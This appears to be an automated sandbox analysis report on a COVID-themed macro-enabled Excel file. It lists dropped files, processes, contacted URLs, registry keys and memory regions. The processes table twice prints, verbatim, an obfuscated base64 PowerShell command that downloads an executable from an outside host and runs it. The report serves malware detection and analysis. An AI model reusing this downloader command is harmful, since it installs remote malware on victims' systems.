Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
COVID.XLSM
|
Microsoft Excel 2007+
|
initial sample
|
 |
|
|
C:\Users\user\Desktop\~$COVID.XLSM
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C6078775.png
|
PNG image data, 858 x 377, 8-bit colormap, non-interlaced
|
dropped
|
 |
|
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
|
|
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\665Y5FDQ12L8FV52M3S3.temp
|
data
|
dropped
|
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd.exe /c 'powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkACgAgACAAIAAgACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkALgBDAGwAbwBzAGUAKAApAAoACgAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcwBhAHYAZQBfAHAAYQB0AGgACgB9AAoACgBQAFMALQBJAG4AcwB0AGEAbABsAGUAcgBWADIAIAAiAGgAdAB0AHAAcwA6AC8ALwBhAHcAbQBlAGwAaQBzAGUAcgBzAC4AYwBvAG0AIgAgACIAYQBwAGkALwB2ADMALwBhAGMAaAB5AHIAYQBuAHQAaABlAHMALwBjAG8AbgB0AHIAYQBwAG8AbABhAHIAaQB6AGEAdABpAG8AbgAvAGsAdQBsAHQAdQByAGsAcgBlAGkAcwAiACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAIgAgACIAQQB3AG0AZQBsAGkAcwBlAHIAcwAgAFMAZQByAHYAaQBjAGUAIgAgACIAZQB4AGUAIgAgACQARgBhAGwAcwBlAA=='
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -ExecutionPolicy BypasS -ENC ZgB1AG4AYwB0AGkAbwBuACAAUABTAC0ASQBuAHMAdABhAGwAbABlAHIAVgAyACAAewAKACAAIAAgACAAcABhAHIAYQBtACgACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAwACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGwAaQBuAGsALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADEAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAZQBuAGQAcABvAGkAbgB0ACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5AD0AJAB0AHIAdQBlACwAIABQAG8AcwBpAHQAaQBvAG4APQAyACkAXQAKACAAIAAgACAAIAAgACAAIABbAHMAdAByAGkAbgBnAF0AIAAkAGYAaQBsAGUAXwBkAGkAcgAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0AMwApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACAAJABmAGkAbABlAF8AbgBhAG0AZQAsAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQA9ACQAdAByAHUAZQAsACAAUABvAHMAaQB0AGkAbwBuAD0ANAApAF0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAZQB4AHQAZQBuAHMAaQBvAG4ALAAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAPQAkAHQAcgB1AGUALAAgAFAAbwBzAGkAdABpAG8AbgA9ADUAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAYgBvAG8AbABdACAAJAB1AHMAZQBfAGEAYwBjAGUAcwBzACwACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAFAAbwBzAGkAdABpAG8AbgA9ADYAKQBdAAoAIAAgACAAIAAgACAAIAAgAFsAcwB0AHIAaQBuAGcAXQAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAKAAoAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJABsAGkAbgBrACAAKwAgACIALwAiACAAKwAgACQAZQBuAGQAcABvAGkAbgB0AAoAIAAgACAAIABpAGYAIAAoACQAdQBzAGUAXwBhAGMAYwBlAHMAcwApACAAewAKACAAIAAgACAAIAAgACAAIAAkAHIAZQBxAF8AcwB0AHIAIAA9ACAAJAByAGUAcQBfAHMAdAByACAAKwAgACIALwAiACAAKwAgACQAYQBjAGMAZQBzAHMAXwBzAHQAcgBpAG4AZwAKACAAIAAgACAAfQAKAAoAIAAgACAAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAAPQAgACQAZgBpAGwAZQBfAGQAaQByACAAKwAgACIAXAAiACAAKwAgACQAZgBpAGwAZQBfAG4AYQBtAGUAIAArACAAIgAuACIAIAArACAAJABlAHgAdABlAG4AcwBpAG8AbgAKAAoAIAAgACAAIAAkAHIAZQBxAHUAZQBzAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBDAHIAZQBhAHQAZQAoACIAJAByAGUAcQBfAHMAdAByACIAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAIAA9ACAAJAByAGUAcQB1AGUAcwB0AC4ARwBlAHQAUgBlAHMAcABvAG4AcwBlACgAKQAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAgAD0AIAAkAHIAZQBzAHAAbwBuAHMAZQAuAEcAZQB0AFIAZQBzAHAAbwBuAHMAZQBTAHQAcgBlAGEAbQAoACkACgAgACAAIAAgACQAcgBlAHMAcABvAG4AcwBlAF8AcwB0AHIAZQBhAG0ALgBDAG8AcAB5AFQAbwAoACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkAKQAKAAoAIAAgACAAIABTAGUAdAAtAEMAbwBuAHQAZQBuAHQAIAAkAHMAYQB2AGUAXwBwAGEAdABoACAALQBWAGEAbAB1AGUAIAAkAGkAbgB0AGUAcgBuAGEAbABfAG0AZQBtAG8AcgB5AC4AVABvAEEAcgByAGEAeQAoACkAIAAtAEUAbgBjAG8AZABpAG4AZwAgAEIAeQB0AGUACgAKACAAIAAgACAAJAByAGUAcwBwAG8AbgBzAGUAXwBzAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkACgAgACAAIAAgACQAaQBuAHQAZQByAG4AYQBsAF8AbQBlAG0AbwByAHkALgBDAGwAbwBzAGUAKAApAAoACgAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgACQAcwBhAHYAZQBfAHAAYQB0AGgACgB9AAoACgBQAFMALQBJAG4AcwB0AGEAbABsAGUAcgBWADIAIAAiAGgAdAB0AHAAcwA6AC8ALwBhAHcAbQBlAGwAaQBzAGUAcgBzAC4AYwBvAG0AIgAgACIAYQBwAGkALwB2ADMALwBhAGMAaAB5AHIAYQBuAHQAaABlAHMALwBjAG8AbgB0AHIAYQBwAG8AbABhAHIAaQB6AGEAdABpAG8AbgAvAGsAdQBsAHQAdQByAGsAcgBlAGkAcwAiACAAIgBDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAIgAgACIAQQB3AG0AZQBsAGkAcwBlAHIAcwAgAFMAZQByAHYAaQBjAGUAIgAgACIAZQB4AGUAIgAgACQARgBhAGwAcwBlAA==
|
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://awmelisers.comp
|
unknown
|
|
|
|
http://www.piriform.com/ccleaner
|
unknown
|
|
|
|
http://www.%s.comPA
|
unknown
|
|
|
|
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
|
unknown
|
|
|
|
https://awmelisers.com
|
unknown
|
|
|
|
https://awmelisers.com/api/v3/achyranthes/contrapolarization/kulturkreis
|
unknown
|
|
|
|
https://awmelisers.comPE
|
unknown
|
|
|
|
https://awmelisers.com/0
|
unknown
|
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
awmelisers.com
|
206.81.23.172
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
206.81.23.172
|
awmelisers.com
|
United States
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
k'3
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
MTTT
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
VBAFiles
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
ReviewToken
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
EC7B2
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
c&3
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Max Display
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Max Display
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 1
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 2
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 3
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 4
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 5
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 6
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 7
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 8
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 9
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 10
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 11
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 12
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 13
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 14
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 15
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 16
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 17
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 18
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 19
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 20
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
F3DAC
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Max Display
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Max Display
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 1
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 2
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 3
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 4
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 5
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 6
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 7
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 8
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 9
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 10
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 11
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 12
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 13
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 14
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 15
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 16
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 17
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 18
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 19
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
Item 20
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
F3ED5
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
LastPurgeTime
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
1033
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
1033
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
EXCELFiles
|
|
|
|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
ProductFiles
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
|
There are 59 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
3494000
|
unkown
|
page read and write
|
|
|
|
40E000
|
heap default
|
page read and write
|
|
|
|
2F33000
|
unkown
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
1BED000
|
unkown
|
page read and write
|
|
|
|
2030000
|
unkown
|
page readonly
|
|
|
|
7FF000E0000
|
unkown
|
page read and write
|
|
|
|
2C1F000
|
unkown
|
page read and write
|
|
|
|
2F92000
|
unkown
|
page read and write
|
|
|
|
1B569000
|
unkown
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
7FF00112000
|
unkown
|
page execute and read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
2F72000
|
unkown
|
page read and write
|
|
|
|
2AB0000
|
heap private
|
page execute and read and write
|
|
|
|
7FF00012000
|
unkown
|
page execute and read and write
|
|
|
|
3515000
|
unkown
|
page read and write
|
|
|
|
7FF00210000
|
unkown
|
page read and write
|
|
|
|
3522000
|
unkown
|
page read and write
|
|
|
|
1BCFD000
|
unkown
|
page read and write
|
|
|
|
2F14000
|
unkown
|
page read and write
|
|
|
|
1E0000
|
unkown
|
page read and write
|
|
|
|
20C0000
|
unkown
|
page readonly
|
|
|
|
7FF0024A000
|
unkown
|
page execute and read and write
|
|
|
|
428000
|
heap default
|
page read and write
|
|
|
|
3746000
|
unkown
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
28F0000
|
unkown
|
page read and write
|
|
|
|
2FAD000
|
unkown
|
page read and write
|
|
|
|
1FEB000
|
unkown
|
page readonly
|
|
|
|
352B000
|
unkown
|
page read and write
|
|
|
|
12D31000
|
unkown
|
page read and write
|
|
|
|
7FF00020000
|
unkown
|
page read and write
|
|
|
|
2F2D000
|
unkown
|
page read and write
|
|
|
|
3765000
|
unkown
|
page read and write
|
|
|
|
1F8F000
|
unkown
|
page read and write
|
|
|
|
34E6000
|
unkown
|
page read and write
|
|
|
|
D0000
|
unkown
|
page readonly
|
|
|
|
2B30000
|
unkown
|
page readonly
|
|
|
|
2F00000
|
unkown
|
page read and write
|
|
|
|
3358000
|
unkown
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
12C21000
|
unkown
|
page read and write
|
|
|
|
318C000
|
unkown
|
page read and write
|
|
|
|
1B5E8000
|
unkown
|
page read and write
|
|
|
|
2F45000
|
unkown
|
page read and write
|
|
|
|
3BF000
|
heap default
|
page read and write
|
|
|
|
2E93000
|
unkown
|
page read and write
|
|
|
|
2C1E000
|
unkown
|
page read and write | page guard
|
|
|
|
3525000
|
unkown
|
page read and write
|
|
|
|
3362000
|
unkown
|
page read and write
|
|
|
|
41B000
|
heap default
|
page read and write
|
|
|
|
1C94E000
|
unkown
|
page read and write
|
|
|
|
2F7C000
|
unkown
|
page read and write
|
|
|
|
2F0D000
|
unkown
|
page read and write
|
|
|
|
2860000
|
unkown
|
page read and write
|
|
|
|
430000
|
unkown
|
page readonly
|
|
|
|
7FF0002C000
|
unkown
|
page execute and read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
2E83000
|
unkown
|
page read and write
|
|
|
|
1C83E000
|
unkown
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
216000
|
unkown
|
page read and write
|
|
|
|
3160000
|
unkown
|
page read and write
|
|
|
|
2C21000
|
unkown
|
page read and write
|
|
|
|
330000
|
heap default
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
2F4C000
|
unkown
|
page read and write
|
|
|
|
29F0000
|
unkown
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
20000
|
heap private
|
page read and write
|
|
|
|
7FF00190000
|
unkown
|
page execute and read and write
|
|
|
|
2F3A000
|
unkown
|
page read and write
|
|
|
|
12C25000
|
unkown
|
page read and write
|
|
|
|
100000
|
heap private
|
page read and write
|
|
|
|
1B2F0000
|
unkown
|
page read and write
|
|
|
|
1B593000
|
unkown
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
2F50000
|
unkown
|
page read and write
|
|
|
|
1B5EB000
|
unkown
|
page read and write
|
|
|
|
30C0000
|
unkown
|
page read and write
|
|
|
|
12D91000
|
unkown
|
page read and write
|
|
|
|
1C74E000
|
unkown
|
page read and write
|
|
|
|
10C000
|
heap private
|
page read and write
|
|
|
|
7FF0001A000
|
unkown
|
page execute and read and write
|
|
|
|
7FF000D2000
|
unkown
|
page execute and read and write
|
|
|
|
3449000
|
unkown
|
page read and write
|
|
|
|
29F0000
|
unkown
|
page readonly
|
|
|
|
1DE0000
|
unkown
|
page write copy
|
|
|
|
2835000
|
unkown
|
page read and write
|
|
|
|
41E000
|
heap default
|
page read and write
|
|
|
|
3BEC000
|
unkown
|
page read and write
|
|
|
|
33C000
|
heap default
|
page read and write
|
|
|
|
3156000
|
unkown
|
page read and write
|
|
|
|
2E71000
|
unkown
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
7FF00280000
|
unkown
|
page execute and read and write
|
|
|
|
1B50D000
|
unkown
|
page read and write
|
|
|
|
7FF000E5000
|
unkown
|
page read and write
|
|
|
|
7FFFFF10000
|
unkown
|
page execute and read and write
|
|
|
|
7FFFFF00000
|
unkown
|
page execute and read and write
|
|
|
|
1FB0000
|
unkown
|
page readonly
|
|
|
|
2EF2000
|
unkown
|
page read and write
|
|
|
|
1B9C0000
|
unkown
|
page read and write
|
|
|
|
7FF00260000
|
unkown
|
page read and write
|
|
|
|
2FB3000
|
unkown
|
page read and write
|
|
|
|
2A07000
|
heap private
|
page read and write
|
|
|
|
3554000
|
unkown
|
page read and write
|
|
|
|
3512000
|
unkown
|
page read and write
|
|
|
|
30B5000
|
unkown
|
page read and write
|
|
|
|
3BE6000
|
unkown
|
page read and write
|
|
|
|
2FC3000
|
unkown
|
page read and write
|
|
|
|
7FF00170000
|
unkown
|
page execute and read and write
|
|
|
|
1B60000
|
unkown
|
page readonly
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
5B0000
|
unkown
|
page readonly
|
|
|
|
3557000
|
unkown
|
page read and write
|
|
|
|
2AA0000
|
unkown
|
page readonly
|
|
|
|
7FF00180000
|
unkown
|
page read and write
|
|
|
|
3551000
|
unkown
|
page read and write
|
|
|
|
2390000
|
unkown
|
page readonly
|
|
|
|
1D00000
|
unkown
|
page readonly
|
|
|
|
281E000
|
unkown
|
page read and write
|
|
|
|
2A10000
|
unkown
|
page readonly
|
|
|
|
2A90000
|
unkown
|
page readonly
|
|
|
|
7FF00220000
|
unkown
|
page execute and read and write
|
|
|
|
2E7D000
|
unkown
|
page read and write
|
|
|
|
2830000
|
unkown
|
page read and write
|
|
|
|
1B5E4000
|
unkown
|
page read and write
|
|
|
|
353E000
|
unkown
|
page read and write
|
|
|
|
1B5B9000
|
unkown
|
page read and write
|
|
|
|
12ED2000
|
unkown
|
page read and write
|
|
|
|
7FF001D0000
|
unkown
|
page execute and read and write
|
|
|
|
309A000
|
unkown
|
page read and write
|
|
|
|
7FF000EA000
|
unkown
|
page execute and read and write
|
|
|
|
3166000
|
unkown
|
page read and write
|
|
|
|
1BF5000
|
heap private
|
page read and write
|
|
|
|
2E61000
|
unkown
|
page read and write
|
|
|
|
1B413000
|
heap private
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
1BF0000
|
heap private
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
1C36000
|
unkown
|
page read and write
|
|
|
|
1B900000
|
unkown
|
page write copy
|
|
|
|
1B517000
|
unkown
|
page read and write
|
|
|
|
1E60000
|
unkown
|
page read and write
|
|
|
|
350C000
|
unkown
|
page read and write
|
|
|
|
2FDF000
|
unkown
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
283A000
|
unkown
|
page read and write
|
|
|
|
2780000
|
unkown
|
page read and write
|
|
|
|
29F0000
|
unkown
|
